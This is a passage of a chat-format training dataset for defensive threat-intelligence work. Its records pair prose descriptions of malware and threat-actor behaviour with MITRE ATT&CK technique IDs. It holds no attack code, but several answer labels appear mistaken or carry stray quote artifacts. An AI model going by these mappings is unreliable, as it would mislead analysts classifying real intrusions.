return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Rocke exploited Apache Struts, Oracle WebLogic (CVE-2017-10271), and Adobe ColdFusion (CVE-2017-3066) vulnerabilities to deliver malware." }, { "role": "assistant", "content": "T1190 - Exploit Public-Facing Application" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Trojan will save the output of the command to %TEMP%\\win.txt and send the contents to the C2 server or “The length of Cmd result file is ziro!” if the command was unsuccessful" }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PLEAD and KIVARS, for instance, share the use of RTLO techniques to disguise their installers as documents. Both also use decoy documents to make the RTLO attack more convincing. Another similarity is the use of a small loader component to load encrypted backdoors into memory" }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PcShare has used HTTP for C2 communication." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Once we deobfuscated it, we found that the script contained a large array of hard coded domain names, with one of them being randomly selected and used for subsequent DNS queries. It is important to note that while the Powershell scripts for stages 3 and 4 contain two arrays of domains, the first array is only used if a failure condition is reached while the sample is using the second array. Figure 8: Stage 3 Domain List The 'logic' function present within this Powershell script randomly selects a C2 domain from the second array in the script and uses this domain to perform an initial lookup. If the result of the initial DNS TXT record request is empty or in the case the lookup fails, the 'do_lookup' function is then called and randomly selects a domain from the first array in the script. Interestingly, the domains used by the 'do_lookup' function did not appear to have active 'www' or 'mail' TXT records. The script also uses specific subdomains which are combined with the domains and used for the initial DNS TXT record queries performed by the malware. The malware uses the contents of the TXT record in the response to these queries to determine what action to take next. For instance, the first subdomain is 'www' and a query response with a TXT record containing 'www' will instruct the script to proceed. The response to this DNS request results in the transmission of the fourth stage malware, stored within the TXT record as displayed in Figures 10 and 11. Due to the size of the Stage 4 payload, DNS makes use of TCP for this transaction" }, { "role": "assistant", "content": "T1071.004 - Application Layer Protocol: DNS" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Okrum can impersonate a logged-on user's security context using a call to the ImpersonateLoggedOnUser API." }, { "role": "assistant", "content": "T1134.001 - Access Token Manipulation: Token Impersonation/Theft" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AADInternals is written and executed via PowerShell." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DRATzarus can use the `GetTickCount` and `GetSystemTimeAsFileTime` API calls to inspect system time." }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can exfiltrate data via a DNS tunnel or email, separately from its C2 channel." }, { "role": "assistant", "content": "T1048 - Exfiltration Over Alternative Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "For Operation Spalax, the threat actors used a variety of packers and droppers to decrypt malicious payloads." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "h) It also uses “ActiveXObject” utility to help in its execution through Microsoft products and internet browsers. The ActiveXObject object is used to create instances of OLE Automation objects in Internet Explorer on Windows operating systems. Several applications (Microsoft Office Word, Microsoft Office Excel, Windows Media Player, etc) provide OLE Automation objects to allow communication with them" }, { "role": "assistant", "content": "T1559.002 - Inter-Process Communication: Dynamic Data Exchange" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Emissary Trojan will use this GUID value provided by the C2 server as an encryption key that it will use to encrypt data sent in subsequent network communications" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information', 'T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT38 has used a custom MBR wiper named BOOTWRECK to render systems inoperable." }, { "role": "assistant", "content": "T1561.002 - Disk Structure Wipe" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "contains a command to retrieve files from its C2 server." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Finally, the threat actors shut down VMs, terminate all related processes, and encrypt Vmware-related files (.log, .vmdk, .vmem, .vswp and .vmsn)." }, { "role": "assistant", "content": "T1486 - Data Encrypted for Impact" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ObliqueRAT can capture images from webcams on compromised hosts." }, { "role": "assistant", "content": "T1125 - Video Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used ports 53, 80, 443, and 8080 for C2." }, { "role": "assistant", "content": "T1043 - Commonly Used Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Operation Wocao has discovered removable disks attached to a system." }, { "role": "assistant", "content": "T1120 - Peripheral Device Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "All observed attacks start with an email message, containing either a malicious attachment or a URL which leads to the first stage of the attack. The text of the emails is likely taken from legitimate email, such as mailing lists that targeted organisations may be subscribed to. Below are three examples, with the first one purporting to be sent by the European Banking Federation and is using a newly registered domain for the spoofed sender email address. The attachment is a malicious PDF file that entices the user to click on a URL to download and open a weaponized RTF file containing exploits for CVE-2017-11882, CVE-2017-8570 and CVE-2018-8174. This campaign contains a URL, which points to a malicious Word document where the infection chain is triggered by the user allowing the VBA macro code to run. Observed email campaign 2 The third campaign, sent on July 10, is a more personal campaign that targets a variety of businesses. The subject indicates that this is a complaint about problems with services provided by the target company, allegedly listed in an attached document. The attachment is an RTF document containing exploits that start the chain of several infection stages until the final executable payload is downloaded and loaded in the memory of the infected system. All emails lead to stage 1 of the attack chain. Observed email campaign 3" }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OLDBAIT collects credentials from Internet Explorer, Mozilla Firefox, and Eudora." }, { "role": "assistant", "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RainyDay can use RC4 to encrypt C2 communications." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT39 has used malware to set \"LoadAppInit_DLLs\" in the Registry key \"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\" in order to establish persistence." }, { "role": "assistant", "content": "T1546.010 - Event Triggered Execution: AppInit DLLs" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The backdoor contain narrow capabilities: download and upload files, run commands and send the attackers the results. However short the list, they allow the attackers to upload and execute additional tools for further reconnaissance and lateral movement" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SpeakUp can perform brute forcing using a pre-defined list of usernames and passwords in an attempt to log in to administrative panels." }, { "role": "assistant", "content": "T1110.001 - Brute Force: Password Guessing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The actors behind this campaign gained access to numerous public and private organizations around the world. They gained access to victims via trojanized updates to SolarWind’s Orion IT monitoring and management software" }, { "role": "assistant", "content": "T1195.002 - Compromise Software Supply Chain" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Group has added persistence by registering the file name for the next stage malware under \"HKCU\\Environment\\UserInitMprLogonScript\"." }, { "role": "assistant", "content": "T1037.001 - Boot or Logon Initialization Scripts: Logon Script (Windows)" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can remotely activate the victim’s webcam to capture content." }, { "role": "assistant", "content": "T1125 - Video Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "provides access to the Windows Registry, which can be used to gather information." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SUPERNOVA was installed via exploitation of a SolarWinds Orion API authentication bypass vulnerability (CVE-2020-10148)." }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RARW Creates RAR files per logical drive containing data with timestamps for the past 7 days, then uploads RAR to the C2 server using a POST command at the path “/FeedBack.php”" }, { "role": "assistant", "content": "T1560 - Archive Collected Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pandora can monitor processes on a compromised host." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HAFNIUM has operated from leased virtual private servers (VPS) in the United States." }, { "role": "assistant", "content": "T1583.003 - Virtual Private Server" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Socksbot can list all running processes." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Attempts to dump the contents of /etc/passwd and /etc/shadow to enable offline password cracking." }, { "role": "assistant", "content": "T1003.008 - OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow', 'T1110.002 - Brute Force: Password Cracking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is capable of executing commands." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Strike can perform browser pivoting and inject into a user's browser to inherit cookies, authenticated HTTP sessions, and client SSL certificates." }, { "role": "assistant", "content": "T1185 - Browser Session Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "We believe that the modified library file, which we’ve named LOCKPICK, could weaken encryption for communications used by the appliance, but do not have enough evidence to confirm this" }, { "role": "assistant", "content": "T1600 - Weaken Encryption" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sykipot may use \"netstat -ano\" to display active network connections." }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Strike will timestomp any files or payloads placed on a target machine to help them blend in." }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "JCry has encrypted files and demanded Bitcoin to decrypt those files." }, { "role": "assistant", "content": "T1486 - Data Encrypted for Impact" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The DNS resolution is performed using DNS over HTTPS (DoH). The malware sends an HTTP POST request to a Google DNS Server (8.8.8.8) using the following headers" }, { "role": "assistant", "content": "T1572 - Protocol Tunneling" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Wizard Spider has used administrative accounts, including Domain Admin, to move laterally within a victim network." }, { "role": "assistant", "content": "T1078.002 - Domain Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Mimikatz credential dumper contains an implementation of an SSP." }, { "role": "assistant", "content": "T1547.005 - Boot or Logon Autostart Execution: Security Support Provider" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The dropper has its encrypted payload embedded as an overlay of a PE file as extra data that will never be used in normal execution steps" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Windigo has used a script to detect installed software on targeted systems." }, { "role": "assistant", "content": "T1518 - Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A Lazarus Group malware sample performs reflective DLL injection." }, { "role": "assistant", "content": "T1055.001 - Process Injection: Dynamic-link Library Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OSX/Shlayer can masquerade as a Flash Player update." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "installs a service pointing to a malicious DLL dropped to disk." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Remsec can obtain a list of users." }, { "role": "assistant", "content": "T1087.001 - Account Discovery: Local Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TeamTNT has deployed different types of containers into victim environments to facilitate execution. TeamTNT has also transferred cryptocurrency mining software to Kubernetes clusters discovered within local IP address ranges." }, { "role": "assistant", "content": "T1610 - Deploy a container" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "xCaon has a command to download files to the victim's machine." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After encrypting its own log files, the log encryption module in Prikormka deletes the original, unencrypted files from the host." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "What does it mean for everyone and how to defend against such attacks, including zero-day exploits? For CVE-2017-11292 and other similar vulnerabilities, one can use the killbit for Flash within their organizations to disable it in any applications that respect it.  Unfortunately, doing this system-wide is not easily done, as Flash objects can be loaded in applications that potentially do not follow the killbit" }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dridex can use multiple layers of proxy servers to hide terminal nodes in its infrastructure." }, { "role": "assistant", "content": "T1090.003 - Proxy: Multi-hop Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Before proceeding to file encryption operations, the ransomware force stops (“kills”) processes listed by process name in a hard-coded list within the encoded strings of the malware. A full list with assessed process function or relationship is provided in Appendix A of this report. While some of the referenced processes appear to relate to security or management software (e.g. Qihoo 360 Safeguard and Microsoft System Center), the majority of the listed processes concern databases (e.g. IBM Tivoli), or ICS-related processes" }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Metamorfo has side-loaded its malicious DLL file." }, { "role": "assistant", "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used valid accounts shared between Managed Service Providers and clients to move between the two environments." }, { "role": "assistant", "content": "T1078 - Valid Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Azorult can steal credentials in files belonging to common software such as Skype, Telegram, and Steam." }, { "role": "assistant", "content": "T1552.001 - Unsecured Credentials: Credentials In Files" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cardinal RAT establishes Persistence by setting the \"HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\Load\" Registry key to point to its executable." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Night Dragon, threat actors used password cracking and pass-the-hash tools to discover usernames and passwords." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT-C-36 has disguised its scheduled tasks as those used by Google." }, { "role": "assistant", "content": "T1036.004 - Masquerading: Masquerade Task or Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mimikatz creates a new server and nTDSDSA objects in the Active Directory forest Configuration partition. Next, it updates the SPN (Service Principal Name) of the computer hosting the rogue domain controller to “GC” (Global Catalog) and “E3514235-4B06-11D1-AB04-00C04FC2DCD2” (Active Directory Replication). The rogue domain controller is now registered and capable of replicating data to other domain controllers." }, { "role": "assistant", "content": "T1207 - Rogue Domain Controller" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has the capability to log keystrokes from the victim’s machine." }, { "role": "assistant", "content": "T1056 - Input Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The initial infection occurs via a weaponized Microsoft Excel (XLS) document delivered via compromised legitimate websites for which the URLs are most likely shared via email. The documents use Visual Basic for Applications (VBA) Macro code which, if enabled by the victim, starts an installation process consisting of multiple components that result in the plug-in loader payload being downloaded and executed" }, { "role": "assistant", "content": "T1204.001 - Malicious Link', 'T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Naikon has modified a victim's Windows Run registry to establish persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "creates a backdoor through which remote attackers can retrieve information such as hostname and free disk space." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BONDUPDATER can download or upload files from its C2 server." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BloodHound can collect information about domain users, including identification of domain admin accounts." }, { "role": "assistant", "content": "T1087.002 - Account Discovery: Domain Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The monitoring loop will retrieve the address of WTSEnumerateSessionsW and the local mac address using GetAdaptersInfo" }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Adversaries aiming to exfiltrate large amounts of data will often use one or more systems or storage locations for intermittent storage of the collected data. This process is called staging and is one of the of the activities that NCC Group and Fox-IT has observed in the analysed C2 traffic" }, { "role": "assistant", "content": "T1560.001 - Archive Collected Data: Archive via Utility', 'T1074.001 - Data Staged: Local Data Staging', 'T1074.002 - Remote Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "obtains the system time and will only activate if it is greater than a preset date." }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "There are multiple active campaigns currently delivering Emotet. The first is a simple email with a Word document attached. This example also shows the second type of campaign, leveraging a direct URL download instead of Office documents with macros that fetch the malware. Malicious code embedded in the malicious attachment functions as a downloader for the Emotet malware. When this code is executed, PowerShell is invoked, which reaches out to the Emotet malware distribution server, downloads the malicious payload, and executes it, thus infecting the system. In the screenshot above, you can see that the script is configured with multiple URLs that can be used to download the PE32 executable associated with Emotet. The malware is overwhelmingly hosted on compromised websites. These sites are then leveraged as random hosting locations for the campaigns to leverage. The initial URL is requested with a connection keep-alive in the header. Talos has observed recent runs of Emotet checking if the compromised system's IP address is currently found on many spam-related blocklists including those hosted by SpamCop, Spamhaus, and SORBS, among others" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The buffer containing the ZxShell Dll in the new location is freed using the VirtualFree API function. A handle to the DLL file is taken in order to make its deletion more difficult. The ZxShell mutex is created named @_ZXSHELL_" }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Linux Rabbit brute forces SSH passwords in order to attempt to gain access and install its malware onto the server." }, { "role": "assistant", "content": "T1110.003 - Brute Force: Password Spraying" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Astaroth spawns a CMD process to execute commands." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter', 'T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After patching, the threat actor can use the Skeleton Key password configured at the time of deployment to log in as any domain user. Legitimate users can still log in using their own passwords" }, { "role": "assistant", "content": "T1556.001 - Domain Controller Authentication" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Empire can acquire network configuration information like DNS servers, public IP, and network proxies used by a host." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "down_new has the ability to base64 encode C2 communications." }, { "role": "assistant", "content": "T1132.001 - Data Encoding: Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Doki has used the dogechain.info API to generate a C2 address." }, { "role": "assistant", "content": "T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "injects its DLL file into a newly spawned Internet Explorer process." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": 